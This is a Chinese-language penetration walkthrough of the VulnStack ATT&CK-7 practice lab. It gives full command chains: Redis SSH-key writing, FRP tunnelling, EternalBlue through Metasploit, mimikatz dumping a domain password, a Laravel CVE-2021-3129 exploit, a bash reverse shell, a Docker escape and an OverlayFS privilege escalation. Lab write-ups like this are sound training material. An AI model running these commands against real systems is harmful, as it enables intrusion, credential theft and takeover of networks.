VulnStack-ATT&CK-7
2024-11-29 12:57:15 # VulnStack-ATT&CK #靶场

服务器渗透

信息收集

1
namp -sV -n -v 192.168.3.0/24

发现192.168.3.7

1
nmap -sV -n -v -p 1-65535 192.168.3.7

image-20240925113831260

未授权访问redis

1
redis-cli -h 192.168.3.7

未授权GetShell

1
2
3
4
5
6
#生成公钥
ssh-keygen -t rsa
#将公钥导入1.txt文件
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt 
#把1.txt文件内容写入目标主机的redis缓冲中
cat 1.txt | redis-cli -h 192.168.43.229 -p 6379 -x set hello
1
2
3
4
config set dir /root/.ssh                #设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys    #设置保存文件名为authorized_keys
save                                     #将数据保存在目标服务器硬盘上
ssh 192.168.43.229                       #连接

得到的是root权限

第一层内网渗透

信息收集

1
ifconfig

image-20240925114436929

第二张网卡192.168.52.10,判断在内网中,执行下面命令扫描内网存活主机

1
for k in $(seq 1 254); do ping -c 1 192.168.52.$k | grep "ttl" | awk -F'[ :]+' '{print $4}'; done

发现该内外中存在192.168.52.20,192.168.52.30

FRP开代理

kali

1
2
nohup ./frps -c frps.ini &
python3 -m http.server 8080

ubuntu

1
2
3
4
wget http://192.168.3.3:8080/frpc
wget http://192.168.3.3:8080/frpc.ini
chmod +x frpc
nohup ./frpc -c frpc.ini &

nmap信息收集

1
2
nmap -sV -p -n 192.168.52.20
nmap -sV -p -n 192.168.52.30

192.168.52.20开启了22、8000等端口,为Linux系统

192.168.52.30开启了445、8080等端口,为Windows系统

永恒之蓝

1
2
3
4
5
6
7
msfconsole
setg Proxies socks5:192.168.3.3:6005
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set autorunscript post/windows/manage/migrate
set rhosts 192.168.52.30

image-20240925120548607

查一下网卡信息

1
shell ipconfig

发现还存在192.168.93.20

第二层内网渗透

KSCAN扫描

上传kscan后进行扫描

1
kscan_windows_amd64.exe -t 192.168.93.0/24

发现存活192.168.93.10(linux)、192.168.93.20(win)、192.168.93.30(win)、192.168.93.40(win)

image-20240925134249581

30、40都开放445,可以尝试永恒之蓝攻击,攻击前我们先使用frp搭建隧道进第二次内网也就是192.168.93.0网段

看看域控DC是哪个

1
ping whoamianony.org

image-20240925134702381

抓一下明文密码

1
2
3
4
upload ~/tq/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
sekurlsa::logonPasswords

image-20240925135812875

发现域控管理明文密码,下面就是开代理链接域控DC

FRP代理

1
2
3
4
5
6
7
# frps2.ini  kali

echo '[common]
bind_addr = 0.0.0.0
bind_port = 7788' >frps2.ini

nohup ./frps -c frps2.ini &
1
2
3
4
5
6
7
# frps3.ini Net1 PC ubuntu

echo '[common]
bind_addr = 192.168.52.10
bind_port = 7799' > frps3.ini

nohup ./frps -c frps3.ini &
1
2
3
4
5
6
7
8
9
10
11
12
# frpc2.ini Net1 PC ubuntu

echo '[common]
server_addr = 192.168.3.3
server_port = 7788
[http_proxy]
type = tcp
local_ip = 192.168.52.10
local_port = 1080
remote_port = 1080' > frpc2.ini

nohup ./frpc -c frpc2.ini &
1
2
3
4
5
6
7
8
9
10
# frpc3.ini Net2 PC windows
echo '[common]
server_addr = 192.168.52.10
server_port = 7799
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5' > frpc3.ini

frpc.exe -c frpc3.ini

到目前为止,1080端口是第二层网络代理,也就是可以访问192.168.93.0/24,6005端口是第一层,访问192.168.52.0/24

连接DC

1
proxychains4 python3 wmiexec-pro.py 'Administrator:Whoami2021@192.168.93.30' exec-command -shell

image-20240925140123180

其余主机渗透

WIN7

1
2
3
4
5
6
7
8
9
msfconsole
setg Proxies socks5:192.168.3.3:1080
search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set autorunscript post/windows/manage/migrate
set rhosts 192.168.93.40
set lport 4466
run

image-20240925134959090

除上面的主机外,第一层网络还存在一个ubuntu192.168.52.20没GetShell

Ubuntu

信息收集

1
proxychains4 nmap -sV -n -v 192.168.52.20

发现8000端口开着,挂代理访问发现是laravel,这个界面和我们直接访问192.168.3.7:81是一样的,说明192.168.3.7在做反代,这里我们对192.168.3.7:81进行渗透测试

GetShell

可以参考laravel RCE(cve-2021-3129)复现 - Running_J - 博客园 (cnblogs.com)

使用下面数据包验证CVE-2021-3129

1
2
3
4
5
6
7
8
9
10
11
12
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.3.7:81
Content-Type: application/json
Content-Length: 168

{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "jack",
"viewFile": "jack1"
}
}

image-20240925142053105

漏洞存在,使用https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

1
python3 laravel-CVE-2021-3129-EXP.py http://192.168.3.7:81

image-20240925142833882

接着使用哥斯拉2连接

image-20240925143108056

为docker环境,我的这里什么都执行不了,注意这个终端是192.168.52.20的,我们将它反弹回192.168.52.10

1
bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/65432 <&1'

image-20240925143628431

查找高权限文件

1
find / -perm -u=s -type f 2>/dev/null

发现/home/jobs/shell

image-20240925143828249

1
2
3
4
5
6
7
8
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/jobs
./shell
python -c 'import pty;pty.spawn("/bin/bash")'

Docker逃逸

192.168.52.20

1
2
3
4
cd /
mkdir hello
mount /dev/sda1 /hello
ls /hello

192.168.52.10

1
2
ssh-keygen -f hack
chmod 600 hack

192.168.52.20

1
2
3
cp -avx /hack/home/ubuntu/.ssh/id_rsa.pub /hack/home/ubuntu/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDH0Pj+AghZo27EjM48eai0FNI/AiJExG6QISl315grBY4yRXlwb1mo6sUnHPRfkUs1XIJq/Ogc1FxFGr3S8VypKMD7cGOsBuGjALgfiXXEGyh4yzuWKG7O+OgAAfEHb4/LwiG8fWcixl14NCxEP7SozIdPhkI17JcFTAy70RmxdoYNJsD+Qa0b4m2gX7kiB5fVrnF266JQwDjpXOSoL8BrAMoTBuJk947OGSlVyZVD40TllLP6q4odylnZ3KS4CUv8p2z8hZoS+W6yUGZoeB6LzS2udqQ1/DDX1qGFH2llra57XCREuoykixGIwXw4HeVTcTPxTa4Ampy3pDHkfKmh root@ubuntu' > /hack/home/ubuntu/.ssh/authorized_keys
cat /hack/home/ubuntu/.ssh/authorized_keys

192.168.52.20

1
ssh -i hack ubuntu@192.168.52.20

权限提升

1
uname -a

image-20240925153721776

存在CVE-2021-3493

briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc (github.com)

先下载到192.168.52.10,再从192.168.52.10下载到192.168.52.20,下载好后执行

1
2
3
gcc exploit.c -o exploit
./exploit
python -c 'import pty;pty.spawn("/bin/bash")'

image-20240925155329340

相关链接

mimikatz使用:

https://www.cnblogs.com/n3w1492/p/13734279.html#:~:text=msf%E4%B8%AD%E7%9A%84mimik

frp多层隧道:

利用Frp建立多层代理_frp多级代理-CSDN博客

CVE-2021-3129利用:

laravel RCE(cve-2021-3129)复现 - Running_J - 博客园 (cnblogs.com)

CVE-2021-3493利用:

briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc (github.com)

Prev
2024-11-29 12:57:15 # VulnStack-ATT&CK #靶场
Next